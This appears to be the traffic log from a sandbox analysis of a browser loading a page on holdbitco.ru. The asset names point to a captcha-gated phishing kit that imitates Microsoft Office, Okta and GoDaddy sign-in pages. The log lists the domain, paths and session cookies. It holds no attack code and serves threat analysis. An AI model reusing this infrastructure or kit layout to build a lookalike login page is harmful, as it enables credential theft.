Source: global trafficHTTP traffic detected: GET /turnstile/v0/g/c359bc3d/api.js?render=explicit HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Intervention: <https://www.chromestatus.com/feature/5718547946799104>; level="warning"sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yxmaiypmfuyt.holdbitco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/js/pages-head-top-web.min.js?cb=1698251257410 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/scripts/jsd/main.js HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/scripts/jsd/c359bc3d/main.js HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/pages/1rd551.css?cb=1698251258165 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/css/pages.min.css?cb=1698251258165 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/css/pages-godaddy.css?cb=1698251258165 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/css/pages-okta.css?cb=1698251258165 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/fonts/GDSherpa-bold.woff2 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://yxmaiypmfuyt.holdbitco.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /4.6.0/socket.io.min.js HTTP/1.1Host: cdn.socket.ioConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yxmaiypmfuyt.holdbitco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/fonts/GDSherpa-bold.woff HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://yxmaiypmfuyt.holdbitco.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/fonts/GDSherpa-regular.woff2 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://yxmaiypmfuyt.holdbitco.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/fonts/GDSherpa-regular.woff HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://yxmaiypmfuyt.holdbitco.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/fonts/GDSherpa-vf.woff2 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://yxmaiypmfuyt.holdbitco.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/fonts/GDSherpa-vf2.woff2 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://yxmaiypmfuyt.holdbitco.rusec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: fontReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/js/pages-head-web.min.js?cb=1698251258165 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/jsd/r/81bbd3f11f9128a6 HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normal HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://yxmaiypmfuyt.holdbitco.ru/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/orchestrate/chl_api/v1?ray=81bbd40e1eca59f1 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/cmg/1/wh0E0SXYnx6pTBdJW%2Fl926I%2BPRUplRdtQz3K9lHXs%2Fs%3D HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /web5/assets/cloudfavicon.ico HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260
Source: global trafficHTTP traffic detected: GET /web5/assets/cloudfavicon.ico HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1490923123:1698250217:y5wy3T9Zh5LE93RSXoIMvIzVSf_O0VV8iCypRe9eLoA/81bbd40e1eca59f1/c7b054a34972c39 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/81bbd40e1eca59f1/1698251262357/QOccPTjuoc1pb_7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/i/81bbd40e1eca59f1/1698251262357/QOccPTjuoc1pb_7 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/pat/81bbd40e1eca59f1/1698251262359/c912553020a62bc88929094fb0f47f021340c58c3915a7cab0eeab2d7f05bdc5/cUDw1TYUdlDKuMR HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveCache-Control: max-age=0sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normalAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1490923123:1698250217:y5wy3T9Zh5LE93RSXoIMvIzVSf_O0VV8iCypRe9eLoA/81bbd40e1eca59f1/c7b054a34972c39 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=S4ayF1XodpULRLK&MD=x2yT1Dku HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /jserrors/1/a3d3f0e0e6?a=7895775&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=68805&ck=1&ref=https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4950c9090a569fe0
Source: global trafficHTTP traffic detected: GET /events/1/a3d3f0e0e6?a=7895775&sa=1&v=1215.1253ab8&t=Unnamed%20Transaction&rst=78813&ck=1&ref=https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25 HTTP/1.1Host: bam-cell.nr-data.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: JSESSIONID=4950c9090a569fe0
Source: global trafficHTTP traffic detected: GET /cdn-cgi/challenge-platform/h/g/flow/ov1/1490923123:1698250217:y5wy3T9Zh5LE93RSXoIMvIzVSf_O0VV8iCypRe9eLoA/81bbd40e1eca59f1/c7b054a34972c39 HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /tools/pso/ping?as=chrome&brand=ONGR&pid=&hl=en&events=C1I,C2I,C7I,C1S,C7S&rep=2&rlz=C1:,C2:,C7:&id=000000000000000000000000000000000000000079CA5C85A9 HTTP/1.1Host: clients1.google.comConnection: keep-aliveSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, br
Source: global trafficHTTP traffic detected: GET /web5/validatecaptcha HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6IlJWMG9PN3pKUW9BNDhXZXVKMzRzWnc9PSIsInZhbHVlIjoiS1R0R1JLYkhCV3k5aW5kS2U4ckVNZkcvTmhWRVpmamxNZGZyU3liVkowTVM1aDh1UVBEUWU0QUYyMi9sWTJhVE1pY1p4dS9HUU1admNKb3dmVUNjZ0k0R0o3L1VKSSt4VmFMSXIvWFJTUGlQVkdUNitRaWU0YmFVdzF4Z20wb3EiLCJtYWMiOiI3M2EyZGY3MDU4ZDE1NzYzMDFjM2M3NTg2ZjRhZWFlMWFhY2EzZjEyODkxNzRiOGU3NGMzZmVjY2JlNDMxZDZjIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6Ilc2MC9aNEZhd0lBTnNqb29WcDBDUEE9PSIsInZhbHVlIjoiYndqMloraERWWGt3RDEzak9kRGQwaktVL3lBS24zV043TUxRclYyMkRYYmRMM2RIeEFncVVTd3d2UklPQVpKT1JsSktOdzdPaEM1bytUdGFsYnlIT1ExVnB6allyT25kWDRIWDJWa2prUDFXeXg0ZUNoWTdmS001Q2JuQW1rZVAiLCJtYWMiOiIzODQxYTRkZWE0MzVlY2FlOGZjNWYzNDc2Zjg1MTgyYzRmNzM1ZjE4MWRmNzFiMGYyMzk0MzMxNzAwMTI1ZjEyIiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /web5/assets/officelogo.png HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/web5/assets/pages/1rd551.css?cb=1698251258165Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; XSRF-TOKEN=eyJpdiI6Ik5Rb09UQ1VOdjBvVHZTZ2dvY2EzcVE9PSIsInZhbHVlIjoiQXNjeTdFTlladXpTZWRlOWdXeXNOUmNyVk1IVnE0NmxlQldGWE51SDVKVk4vMHZuT0VDTTRrOFNEZlgzUC9md01BRkgxRlFvNUJ3TmhGRlJzc3Y0UVUzVG5yNlVnOUJacWMzcHBUVXhlZEd2dGc4STVqbEQ5U2V6VXpTKzFhUnoiLCJtYWMiOiIxZWQ3MjY0YjJkOWZmMzYyNzkxZWY3NWMxMDE1ZDAxNTY4ZTRmMGQ2MzQxYmUzNDNlNTVkNWE1YmM0MzFiY2MwIiwidGFnIjoiIn0%3D; laravel_session=eyJpdiI6InlHNnlLU3N5VVRhem1oZ3NRT3Yrbnc9PSIsInZhbHVlIjoidlFZWnM3RGRqMmo0ZmJyNFJjUnIyNTgveTJnUkozQVVFTm5VTlV5L1NacjhiVDRIQ2gzRmc4QUVNbUQ1eUxlT3prQnNuSHNvdVNMN3hBMVBZRDlWaklZeEtBQy9uK21DTzBWTTVoUHFFNlVlYlJuOW5IL0hKWlhSdjh0U3NBd1QiLCJtYWMiOiI4ZGU4NjliOGJjYTcwMjZhYzYzNTI2YzdhZTRiYTI0YmJjODliYjIwYThlNTEwODUxMzYxMzQ2MzZhNDRjNDI0IiwidGFnIjoiIn0%3D
Source: global trafficHTTP traffic detected: GET /web5/assets/microsoftfavicon.ico HTTP/1.1Host: yxmaiypmfuyt.holdbitco.ruConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://yxmaiypmfuyt.holdbitco.ru/ynabwktmcAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: cf_clearance=LkHGzvo_IwkTO1pAwEyKBl2ahuC4yTBUkz5zskdHIa0-1698251260-0-1-77df9780.2f6afecc.20dec860-0.2.1698251260; 